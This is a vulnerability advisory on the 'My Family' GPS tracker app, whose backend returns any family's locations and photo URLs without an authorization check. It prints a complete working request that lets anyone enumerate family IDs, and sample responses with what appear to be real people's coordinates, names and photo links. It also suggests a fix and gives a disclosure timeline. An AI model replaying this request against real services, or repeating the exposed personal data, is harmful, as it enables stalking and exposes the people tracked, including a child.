SIK-2017-012


Title:

 

My Family GPS tracker data accessible to public

Report ID

 

SIK-2017-012

Summary:

 

  • Vendor: net.prtm.myfamily
  • Product: My Family
  • Affected Version: 5.27, Probably all
  • Severity: Private data public
  • Short summary: Location and sometimes images visible with simple http request

Details:

 

The backend of the app provides GPS data and the URL to the photos without proper authorization checks, i.e., everybody can see all GPS coordinates and photos of all users. Example request:

POST /api HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 164
Host: 52.50.25.155
Connection: close
User-Agent: okhttp/3.3.0

request=%7B%22method%22%3A%22SyncLocation%22%2C%22options%22%3A%7B%22family_id%22%3A650759%7D%2C%22uid%22%3A%22ADM-59b41139c1c64b8430%3A85%3Aa9%3Adf%3A5f%3Aeb%22%7D

Family ID: A numerical ID (650759 in the example). Any family can be accessed. Example responses:

{"code":204,"response":[{"pid":"919081","name":"","avatar":"0","avatar_img":"","is_history":"1","is_child":"0","battary":"16","position":{"lat":"54.737669","lng":"20.497225","accuracy":"22","time":"1493228407321","provider":"fused","satellites":"0"},"is_location":0}]}

{"code":204,"response":[{"pid":"918111","name":"\u0421","avatar":"0","avatar_img":"","is_history":"1","is_child":"0","battary":"9","position":{"lat":"55.669682","lng":"37.536886","accuracy":"23","time":"1493221696994","provider":"fused","satellites":"0"},"is_location":0},{"pid":"918112","name":"","avatar":"0","avatar_img":"","is_history":"1","is_child":"0","battary":"15","position":{"lat":"55.403762","lng":"37.490915","accuracy":"116","time":"1493215759975","provider":"fused","satellites":"0"},"is_location":0}]}

{"code":204,"response":[{"pid":"918161","name":"LENOVO A3300","avatar":"43","avatar_img":"","is_history":"1","is_child":"0","battary":"10","position":{"lat":"49.660140","lng":"32.023471","accuracy":"23","time":"1493215276616","provider":"fused","satellites":"0"},"is_location":0},{"pid":"918331","name":"Nomi i3050","avatar":"42","avatar_img":"","is_history":"1","is_child":"1","battary":"11","position":{"lat":"49.601861","lng":"31.925968","accuracy":"3586","time":"1493216787322","provider":"fused","satellites":"0"},"is_location":0}]}

example response with profile picture:

{"code":204,"response":[{"pid":"358721","name":"\u0412\u043e\u0441\u044f","avatar":"37","avatar_img":"http:\/\/bestmyfamily.s3-website-eu-west-1.amazonaws.com\/photos\/3c\/3c73f50d4211f6e18be3d7567862950e-7.jpg","is_history":"1","is_child":"0","battary":"90","position":{"lat":"61.103364","lng":"72.582623","accuracy":"22","time":"1493222885412","provider":"network","satellites":"0"},"is_location":0},{"pid":"869397","name":"\u0412\u0435\u0440\u0430","avatar":"0","avatar_img":"http:\/\/bestmyfamily.s3-website-eu-west-1.amazonaws.com\/photos\/d9\/d9a000d78092aff0f4c2b2d041380529-9.jpg","is_history":"1","is_child":"0","battary":"81","position":{"lat":"61.103605","lng":"72.582713","accuracy":"1","time":"1493230492000","provider":"fused","satellites":"0"},"is_location":0}]}

Workaround

 

None available.

Suggested Mitigation

 

The backend should always check whether the requesting user is properly authorized to receive the data that is being requested. Backends should never trust incoming requests and should assume that all data they receive from the client has been forged or manipulated. In the concrete case, this means that the request should contain a means of identifying the current user (e.g., a session token) and that the server should check whether the requested family ID is actually associated with the user to which the token belongs. If the user requests data for a different family ID, the request should be denied.

Timeline

 

  • 2017-04-26: found vulnerability
  • 2017-05-18: Reported
  • 2018-08-11: Published